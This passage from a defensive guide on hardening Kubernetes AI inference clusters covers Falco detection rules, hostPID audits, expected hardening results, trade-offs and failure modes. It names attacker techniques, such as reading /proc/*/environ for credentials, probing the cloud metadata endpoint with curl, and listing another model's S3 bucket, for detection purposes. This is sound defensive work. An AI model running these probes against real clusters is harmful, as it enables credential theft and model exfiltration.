6. Falco Rules for AI Cluster-Specific Threat Detection

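Standard Falco rulesets do not cover AI inference-specific behaviours. Add rules targeting the specific attack techniques described above. Treat the rules below as sketches: confirm that each field exists in your Falco and k8saudit plugin versions (falco --list prints the supported fields), and define the IP lists they reference before loading them: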

- rule: Model Weight PVC Mounted by Non-Inference Pod
  desc: >
    A pod that is not labelled as an inference pod mounted a volume
    whose PVC name matches model weight naming patterns. Possible
    model exfiltration attempt.
  condition: >
    ka.verb = "create" and
    ka.target.resource = "pods" and
    (
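      ka.req.pod.volumes.persistentvolumeclaim.claimname glob "*model*" or
      ka.req.pod.volumes.persistentvolumeclaim.claimname glob "*weights*" or
      ka.req.pod.volumes.persistentvolumeclaim.claimname glob "*llama*" or
      ka.req.pod.volumes.persistentvolumeclaim.claimname glob "*mistral*"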
    ) and
    not (ka.req.pod.labels contains "role:inference")
  output: >
    Non-inference pod mounting model weight PVC
    (user=%ka.user.name pod=%ka.req.pod.name ns=%ka.target.namespace
    pvc=%ka.req.pod.volumes.persistentvolumeclaim.claimname)
  priority: ERROR
  source: k8s_audit

- rule: Inference Pod Reading Sibling Process Environ
  desc: >
    An inference pod is reading /proc/PID/environ of another process.
    This is the pattern for credential harvesting from co-scheduled
    pods on the same node.
  condition: >
    open_read and
    fd.name glob "/proc/*/environ" and
    k8s.pod.label.role = "inference" and
    not proc.name in (ps, top, monitoring_agent)
  output: >
    Inference pod reading sibling process environment variables
    (container=%container.name pod=%k8s.pod.name
    file=%fd.name proc=%proc.name)
  priority: CRITICAL
  source: syscall

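# model_registry_ips, prometheus_ips and dns_server_ips must be defined as Falco lists before this rule will load
- rule: Unexpected Outbound Connection from Inference Pod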
  desc: >
    An inference pod initiated an outbound TCP connection to a
    destination not in the approved egress list. May indicate
    active exfiltration.
  condition: >
    outbound and
    k8s.pod.label.role = "inference" and
    not fd.rip in (model_registry_ips) and
    not fd.rip in (prometheus_ips) and
    not fd.rip in (dns_server_ips)
  output: >
    Inference pod unexpected outbound connection
    (container=%container.name pod=%k8s.pod.name
    dest=%fd.rip:%fd.rport proc=%proc.cmdline)
  priority: ERROR
  source: syscall

- rule: GPU Device Plugin Spawning Shell
  desc: >
    The nvidia-device-plugin spawned an interactive shell or
    unexpected subprocess. Possible exploitation of device plugin.
  condition: >
    spawned_process and
    container.image.repository contains "nvidia" and
    container.image.repository contains "device-plugin" and
    proc.name in (bash, sh, dash, zsh, python, python3)
  output: >
    nvidia-device-plugin spawning shell
    (container=%container.name image=%container.image.repository
    shell=%proc.name cmdline=%proc.cmdline)
  priority: CRITICAL
  source: syscall

Deploy these rules via a Falco ConfigMap and mount them into the Falco DaemonSet under /etc/falco/rules.d/ai-inference.yaml. Alerts should route to your SIEM with the pod name, namespace, and relevant file path for triage.
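
On the receiving side, the triage fields can be pulled out of Falco's JSON output with very little code. This sketch assumes Falco runs with JSON output enabled and that the rule's output string references k8s.pod.name, k8s.ns.name and fd.name, so those keys appear under output_fields; triage and PAGE_PRIORITIES are hypothetical names, and the paging threshold is an arbitrary choice for the example.

```python
import json

PAGE_PRIORITIES = {"EMERGENCY", "ALERT", "CRITICAL"}  # assumed paging threshold


def triage(alert_line):
    """Extract routing fields from one line of Falco JSON output."""
    alert = json.loads(alert_line)
    fields = alert.get("output_fields") or {}
    return {
        "rule": alert.get("rule"),
        "page": str(alert.get("priority", "")).upper() in PAGE_PRIORITIES,
        "pod": fields.get("k8s.pod.name"),
        "namespace": fields.get("k8s.ns.name"),
        "file": fields.get("fd.name"),
    }
```

Fields that a rule does not emit come back as None, which makes it easy to spot rules whose output string needs extending before the alert is useful to an analyst.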

7. Audit GPU Node Access and Process Namespace Visibility

Reduce the /proc enumeration surface by ensuring that pods cannot see processes outside their own pod. Two pod spec fields matter, and both default to false: hostPID places the pod in the node's PID namespace, while shareProcessNamespace shares a single PID namespace among the containers of one pod:

# Verify no inference pods have hostPID enabled:
kubectl get pods -n ai-inference -o json | jq -r '
  .items[] |
  select(.spec.hostPID == true) |
  .metadata.name
'
# Should produce no output. Any output is a critical misconfiguration.

# List inference pods whose containers share one PID namespace (within the pod, not with the node):
kubectl get pods -n ai-inference -o json | jq -r '
  .items[] |
  select(.spec.shareProcessNamespace == true) |
  .metadata.name
'

For the GPU device plugin itself, hostPID: true is never required for device registration. If it is present in your DaemonSet spec, remove it.

Expected Behaviour After Hardening

After deploying the Kyverno policy: a pod creation attempt that mounts llama3-70b-weights without role: inference receives an admission denial before the pod is created. No compute is consumed. The denial is logged by Kyverno and surfaced in the Kubernetes audit log with the policy name and the specific condition that failed.

After scoping IRSA roles per model: a pod running under the llama3-70b-inference service account that attempts aws s3 ls s3://company-models/llama3-70b-finance-finetuned/ receives an AccessDenied error from the S3 API. The access attempt is logged in AWS CloudTrail under the role ARN, making the attempt attributable to the specific service account.

After deploying NetworkPolicy: a compromised inference pod that attempts curl http://169.254.169.254/latest/meta-data/ times out with no response. A pod that attempts to reach another pod in the cluster via ClusterIP also times out, since most CNI plugins silently drop denied traffic rather than resetting the connection. The inference pod can reach its approved egress destinations (the S3 VPC endpoint, Prometheus, and DNS) and nothing else.

After deploying Falco rules: when the Model Weight PVC Mounted by Non-Inference Pod rule fires, the alert is available within seconds of the API server processing the pod creation request. The audit log event includes the PVC claim name and the user identity that submitted the pod spec, enabling rapid triage of whether the activity was authorised or an active incident.

Trade-offs

ReadWriteMany PVC for model weights requires a network filesystem: NFS, EFS on AWS, or Filestore on GCP. Network filesystem latency adds to model load time at pod startup. A Llama 3 70B model loading from EFS takes 4-8 minutes depending on network bandwidth allocation; the same load from local NVMe takes under 90 seconds. The operational response is pre-loading weights to a node-local cache on startup, with the PVC as the source of truth. This adds complexity but retains the security boundary: when the PVC is mounted read-only (readOnly: true on the volume mount, or a ReadOnlyMany claim where the storage class supports it), inference pods cannot write to it, which protects the canonical weight files from tampering.
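
The load times above translate directly into sustained throughput, which is the number to compare against a storage tier's provisioned bandwidth. A small worked calculation, using the article's figure of roughly 140 GB of weights; implied_throughput_gb_s is a hypothetical helper and the results are back-of-the-envelope arithmetic, not measurements.

```python
def implied_throughput_gb_s(size_gb, seconds):
    """Sustained read throughput (GB/s) needed to load size_gb in the given time."""
    if seconds <= 0:
        raise ValueError("seconds must be positive")
    return size_gb / seconds


WEIGHTS_GB = 140  # approximate bfloat16 size of a 70B-parameter model

nvme = implied_throughput_gb_s(WEIGHTS_GB, 90)           # about 1.56 GB/s
efs_fast = implied_throughput_gb_s(WEIGHTS_GB, 4 * 60)   # about 0.58 GB/s
efs_slow = implied_throughput_gb_s(WEIGHTS_GB, 8 * 60)   # about 0.29 GB/s
```

In other words, the quoted 4-8 minute network load corresponds to roughly 0.3-0.6 GB/s per pod, while a sub-90-second load needs more than 1.5 GB/s. That gap is the case for the node-local cache.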

Per-model IRSA roles multiply the number of IAM roles in the account. An organisation running 20 model variants has 20 inference IAM roles plus associated trust policies and IRSA annotations. Infrastructure-as-code (Terraform, Pulumi) removes most of the manual maintenance burden, but the pattern should be adopted from the beginning of the cluster build: retrofitting per-model roles onto an existing single-role deployment requires coordinated changes to IAM, Kubernetes service accounts, and pod specs.
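On the Kubernetes side, the per-model pattern amounts to one service account per model, each annotated with its own role ARN. The fragment below is a sketch: the account ID, the role names, the second service account name, and the inference namespace are placeholders, and each role's IAM policy and trust policy still have to be defined separately.

```yaml
# One service account per model, each bound to its own IAM role via IRSA.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: llama3-70b-inference
  namespace: inference   # assumed namespace
  annotations:
    # Placeholder account ID and role name
    eks.amazonaws.com/role-arn: arn:aws:iam::111122223333:role/llama3-70b-inference
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: llama3-70b-finance-finetuned-inference   # hypothetical name
  namespace: inference
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::111122223333:role/llama3-70b-finance-finetuned-inference
```

Each pod spec then sets serviceAccountName to the account for the model it serves, so a compromised pod holds credentials for one model prefix only.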

Dropping privileged: true from the nvidia-device-plugin may break certain GPU operator configurations. The GPU operator bundles the device plugin with additional components (MIG manager, DCGM exporter, container toolkit) that have different privilege requirements. Audit each component individually: the device plugin itself requires device file access, not full privilege; the DCGM exporter for metrics collection also does not require privilege; the container toolkit installer does require elevated access but runs as a one-time init container, not continuously. Do not accept privileged: true for the long-running device plugin container without verifying that no less privileged configuration works.

Inference API authentication adds overhead to every request. At high throughput (tens of thousands of requests per second on a busy inference cluster) the JWT validation or API key lookup overhead is measurable. The practical mitigation is to validate once at the gateway and pass a trusted header to the inference server, rather than validating again at the inference server for each request. This keeps the authentication overhead off the inference server while maintaining the security boundary, provided the inference server accepts traffic only from the gateway; otherwise any pod that can reach it directly can forge the header.
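A header set by the gateway is only trustworthy if nothing else can connect to the inference server. One way to enforce that is an ingress NetworkPolicy that admits traffic from the gateway pods alone. The following is a sketch: the gateway namespace, the app: api-gateway label, and port 8000 are assumptions to be replaced with the values used in the actual deployment.

```yaml
# Only gateway pods may open connections to inference pods.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: inference-ingress-from-gateway-only
  namespace: inference                 # assumed namespace
spec:
  podSelector:
    matchLabels:
      role: inference
  policyTypes:
    - Ingress
  ingress:
    - from:
        # namespaceSelector and podSelector in ONE list item are ANDed:
        # the peer must be a gateway pod inside the gateway namespace.
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: gateway   # assumed namespace name
          podSelector:
            matchLabels:
              app: api-gateway                       # assumed label
      ports:
        - protocol: TCP
          port: 8000                                 # assumed serving port
```

If Prometheus scrapes the inference pods directly, it needs its own entry in the from list, scoped to the metrics port.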

Failure Modes

The nvidia-device-plugin runs privileged by default in official documentation examples. Platform teams who follow the quickstart guide and do not read the security considerations section deploy privileged DaemonSets on every GPU node. Because the device plugin works correctly in this configuration and GPU workloads schedule successfully, there is no operational signal that the privilege level is wrong. The privileged configuration remains in place indefinitely unless a security review explicitly targets DaemonSet privilege levels.

A single IRSA role for all inference workloads is the natural outcome of a “let me get the model loading first” deployment approach. The role is created with broad S3 access to unblock the deployment, and a ticket is filed to scope it later. The ticket is never prioritised because the cluster is serving traffic successfully. Months later, the cluster has three proprietary fine-tuned models, all accessible via the same role that the original base model deployment used.

ReadWriteMany PVCs without admission control are outside the reach of Kubernetes RBAC, which has no permission that governs mounting a specific PVC. Any principal with create pods in the inference namespace, which includes developers with namespace-level edit access, can mount any PVC in that namespace. This is frequently the case where development workloads share a namespace with production models. Two controls are required to close this: Kyverno or OPA Gatekeeper admission policies that restrict PVC mounts by pod label, and RBAC that restricts pod creation in the inference namespace to the CI system service account only.
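The RBAC half of that control can be sketched as follows. The ci-deployer service account, the ci namespace, and the inference-developers group are hypothetical names. Because RBAC is purely additive, these objects only help once every existing binding that grants developers edit or admin in the namespace has been removed.

```yaml
# Workload creation in the inference namespace is granted to CI only.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: workload-deployer
  namespace: inference               # assumed namespace
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["create", "delete", "get", "list", "watch"]
  # Controllers create pods on the caller's behalf, so they are scoped too.
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["create", "update", "patch", "delete", "get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ci-workload-deployer
  namespace: inference
subjects:
  - kind: ServiceAccount
    name: ci-deployer                # hypothetical CI service account
    namespace: ci                    # hypothetical namespace
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: workload-deployer
---
# Developers keep read-only visibility through the built-in view ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: developers-view
  namespace: inference
subjects:
  - kind: Group
    name: inference-developers       # hypothetical group name
    apiGroup: rbac.authorization.k8s.io
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: view
```

Any other resource that produces pods (StatefulSets, Jobs, CronJobs) needs the same treatment, since create access to any of them is equivalent to create pods.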

No NetworkPolicy on the inference namespace means that a compromised inference pod has a flat network to the entire cluster. It can reach the Kubernetes API server (kubernetes.default.svc), etcd if exposed, other namespaces’ ClusterIP services, and cloud provider metadata endpoints. NetworkPolicy is opt-in in Kubernetes — the absence of a policy means allow-all, not deny-all. A cluster that has not explicitly restricted inference pod egress has the most permissive possible default.

Falco rules for standard Kubernetes threats do not detect AI inference-specific patterns. A standard Falco ruleset will alert on obvious syscall anomalies and known container escape techniques, but will not fire on a pod mounting a model weight PVC with an exfiltration command, on systematic querying of an unauthenticated inference API, or on the specific /proc/PID/environ access pattern used for GPU node credential harvesting. AI inference clusters require AI inference-specific detection rules, deployed in addition to — not instead of — the standard ruleset.